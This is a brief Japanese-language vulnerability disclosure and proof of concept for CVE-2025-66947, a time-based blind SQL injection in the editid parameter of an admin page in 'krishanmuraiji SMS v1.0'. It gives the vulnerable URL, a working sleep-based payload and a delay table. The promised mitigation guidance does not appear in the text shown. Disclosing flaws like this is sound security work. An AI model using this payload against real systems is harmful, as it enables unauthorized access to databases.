
PHP管理パネルにおける時間ベースのブラインドSQLインジェクションの概念実証。サニタイズされていないGETパラメータを介した悪用を実演し、防御的な使用のための緩和策のガイダンスを提供します。
⏱️ 視覚的な比較:通常の応答 vs 約6秒の遅延応答
TL;DR: 管理モジュールのGETパラメータにより、応答遅延を介した時間ベースのSQLインジェクションが可能になります。
krishanmuraiji SMS v1.0 には、管理モジュールのGETパラメータの検証が不適切なため、時間ベースのブラインドSQLインジェクションの脆弱性 が存在します。
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| ペイロード | 遅延時間 |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
一貫した遅延 = SQLインジェクション確認済み
この脆弱性パターンは、以下の環境でよく見られます:
認証が必要でエラーが非表示の場合でも、
時間ベースのSQLインジェクションは悪用可能で危険なままです。
重要度: 高
CVE-2025-66947
Ranjan KumarこのPoCは教育および防御目的のみで提供されています。
CVE-2025-66947、SQLインジェクション、時間ベースのブラインドSQLインジェクション、PHP、管理パネル